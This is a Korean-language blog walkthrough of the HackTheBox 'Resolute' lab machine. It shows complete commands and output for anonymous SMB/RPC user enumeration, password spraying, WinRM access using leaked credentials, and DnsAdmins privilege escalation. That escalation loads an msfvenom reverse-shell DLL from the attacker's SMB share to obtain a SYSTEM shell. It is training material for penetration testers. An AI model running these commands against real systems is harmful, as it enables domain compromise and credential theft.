53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
서버에 열려있는 포트로 보아 컨트롤러 같습니다.
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 09:11:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-10-30T02:12:23-07:00
|_clock-skew: mean: 2h14m33s, deviation: 4h02m30s, median: -5m27s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-30T09:12:24
|_ start_date: 2024-10-30T06:31:34
그리고 자세한 스캔에서 FQDN과 도메인 이름 등을 수집할 수 있었습니다.
이 정보들을 hosts와 resolve.conf에 추가해줍니다.
SMB에 대해서 익명 로그인이 가능하길래
users 플래그를 통해서 유저 목록을 확인해봤는데 유저 목록이 출력됩니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u '' -p '' --users
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.169 445 RESOLUTE Administrator 2024-10-30 09:15:02 0 Built-in account for administering the computer/domain
SMB 10.10.10.169 445 RESOLUTE Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.169 445 RESOLUTE krbtgt 2019-09-25 13:29:12 0 Key Distribution Center Service Account
SMB 10.10.10.169 445 RESOLUTE DefaultAccount <never> 0 A user account managed by the system.
SMB 10.10.10.169 445 RESOLUTE ryan 2024-10-30 09:15:02 0
SMB 10.10.10.169 445 RESOLUTE marko 2019-09-27 13:17:14 0 Account created. Password set to Welcome123!
SMB 10.10.10.169 445 RESOLUTE sunita 2019-12-03 21:26:29 0
SMB 10.10.10.169 445 RESOLUTE abigail 2019-12-03 21:27:30 0
SMB 10.10.10.169 445 RESOLUTE marcus 2019-12-03 21:27:59 0
SMB 10.10.10.169 445 RESOLUTE sally 2019-12-03 21:28:29 0
SMB 10.10.10.169 445 RESOLUTE fred 2019-12-03 21:29:01 0
SMB 10.10.10.169 445 RESOLUTE angela 2019-12-03 21:29:43 0
SMB 10.10.10.169 445 RESOLUTE felicia 2019-12-03 21:30:53 0
SMB 10.10.10.169 445 RESOLUTE gustavo 2019-12-03 21:31:42 0
SMB 10.10.10.169 445 RESOLUTE ulf 2019-12-03 21:32:19 0
SMB 10.10.10.169 445 RESOLUTE stevie 2019-12-03 21:33:13 0
SMB 10.10.10.169 445 RESOLUTE claire 2019-12-03 21:33:44 0
SMB 10.10.10.169 445 RESOLUTE paulo 2019-12-03 21:34:46 0
SMB 10.10.10.169 445 RESOLUTE steve 2019-12-03 21:35:25 0
SMB 10.10.10.169 445 RESOLUTE annette 2019-12-03 21:36:55 0
SMB 10.10.10.169 445 RESOLUTE annika 2019-12-03 21:37:23 0
SMB 10.10.10.169 445 RESOLUTE per 2019-12-03 21:38:12 0
SMB 10.10.10.169 445 RESOLUTE claude 2019-12-03 21:39:56 0
SMB 10.10.10.169 445 RESOLUTE melanie 2024-10-30 09:15:02 0
SMB 10.10.10.169 445 RESOLUTE zach 2019-12-04 10:39:27 0
SMB 10.10.10.169 445 RESOLUTE simon 2019-12-04 10:39:58 0
SMB 10.10.10.169 445 RESOLUTE naoki 2019-12-04 10:40:44 0
이것을 SMBUsers.txt에 저장해주고 브루트포스 포맷으로 변환해줍니다.
그리고 AS-REP-Roasting 공격을 해봤는데 취약한 유저는 없습니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-GetNPUsers megabank.local/'' -usersfile SMBUsers.txt -dc-ip 10.10.10.169
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
한편 msrpc에 익명 바인딩을 한 뒤에 쿼리를 날려보니
쿼리를 사용할 권한이 있습니다.
msrpc에 대해서 익명 바인딩과 쿼리 사용을 허용해둔 것 같습니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# rpcclient -U "" -N megabank.local
rpcclient $> querydominfo
Domain: MEGABANK
Server:
Comment:
Total Users: 79
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
dispinfo를 통해서 유저 정보를 확인했는데
marko라는 계정의 패스워드가 생성되었을 때 Welcome123!으로
설정되었다는 설명이 보입니다.
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
그래서 아까전에 SMBUsers.txt에 있는 계정 목록 중에서
Welcome123!으로 로그인이 되는 유저가 있는지 스프레잉 공격을 해줍니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc smb megabank.local -u SMBUsers.txt -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
그리고 melanie 계정에서 해당 패스워드로 로그인이 성공합니다.
nxc를 통해서 melanie 계정이 Remote 유저인 것을 확인해서
evil-winrm을 통해 melanie 사용자 쉘을 획득할 수 있습니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u melanie -p 'Welcome123!'
WINRM 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u melanie -p Welcome123!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
언제나 그렇듯이 초기침투에 성공하면 먼저 권한과 그룹을 확인해주고
파워쉘 히스토리 파일을 찾아봤는데 숨겨져 있던 히든 파일인
파워쉘 히스토리가 발견됩니다.
*Evil-WinRM* PS C:\Users\melanie\Documents> Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Filter "*PowerShell*.txt"
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
해당 파워쉘 히스토리를 읽어서 파이프라인으로 ps.txt로 저장한다음
이것을 칼리 로컬로 다운로드 합니다.
*Evil-WinRM* PS C:\Users\melanie\Documents> cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt > ps.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> download ps.txt
Info: Downloading C:\Users\melanie\Documents\ps.txt to ps.txt
Info: Download successful!
그리고 해당 파워쉘 히스토리에서는 ryan 계정으로 SMB를 연결하려는 시도가 보이며 이곳에서 패스워드 정보가 하드코딩 되어있습니다.
ryan : Serv3r4Admin4cc123!
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nxc winrm megabank.local -u ryan -p 'Serv3r4Admin4cc123!'
WINRM 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
┌──(root㉿kali)-[~/Pentest/Machine]
└─# evil-winrm -i megabank.local -u ryan -p 'Serv3r4Admin4cc123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
획득한 ryan 사용자도 Remote Management User이어서
winrm으로 연결이 되었습니다.
반면 ryan 계정은 DnsAdmins 그룹에 속해있습니다.
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
DnsAdmins는 DNS 서비스를 관리할 수 있는 그룹인데
이 그룹에 속해있으면 DNS 서비스의 dll 경로를 변조하여
악성코드를 업로드한 다음 DNS 서비스를 재실행하여
시스템 권한을 획득할 수 있습니다.
자세한 내용은 아래 글을 참조합니다.
먼저 dll 악성파일을 만들기 위해서 msfvenom을 이용합니다.
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f dll > rev.dll
그리고 이 동적라이브러리를 가져갈 수 있도록 서버를 열어줍니다.
impacket-smbserver share -smb2support .
msfvenom으로 악성코드를 만들 때 포트를 4444로 지정했으므로
ncat을 이용해서 4444포트를 열어둡니다.
nc -lvnp 4444
마지막으로 서버에서 DNS 참조 링크를 칼리 smb 서버 경로로 지정한 다음
sc.exe를 사용해서 dns 서비스를 재실행 해주면 끝입니다.
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.21\share\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 644
FLAGS
이렇게 재실행 했을 때 먼저 열려있던 칼리 smb 서버에 접속하여
dll 파일을 가져갑니다.
그 기록은 칼리 터미널에 남습니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-smbserver share -smb2support .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,57920)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:c4cf63c48f5e74889f9771b7e0e747f1:010100000000000000d5ad10b02adb019ab1416c88401bcb00000000010010004c004100720078007300490077006300030010004c00410072007800730049007700630002001000650076005300670072006a005400550004001000650076005300670072006a00540055000700080000d5ad10b02adb0106000400020000000800300030000000000000000000000000400000f6a498ccbba2aaa00cd38aa8e271e8ea695faac0038a4ca3c3730c2b4795de0f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320031000000000000000000
그 다음 가져간 dll 파일을 실행하면 리버스쉘 연결을 시도하게 될 것이고
대기중이던 포트에는 시스템 쉘이 획득됩니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.169] 57922
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
[HackTheBox] Administrator (0) | 2024.12.12 |
---|---|
[HackTheBox] Blackfield (1) | 2024.10.30 |
[HackTheBox] Search (1) | 2024.10.30 |
[HackTheBox] Active (0) | 2024.10.29 |
[HackTheBox] Sauna (1) | 2024.10.29 |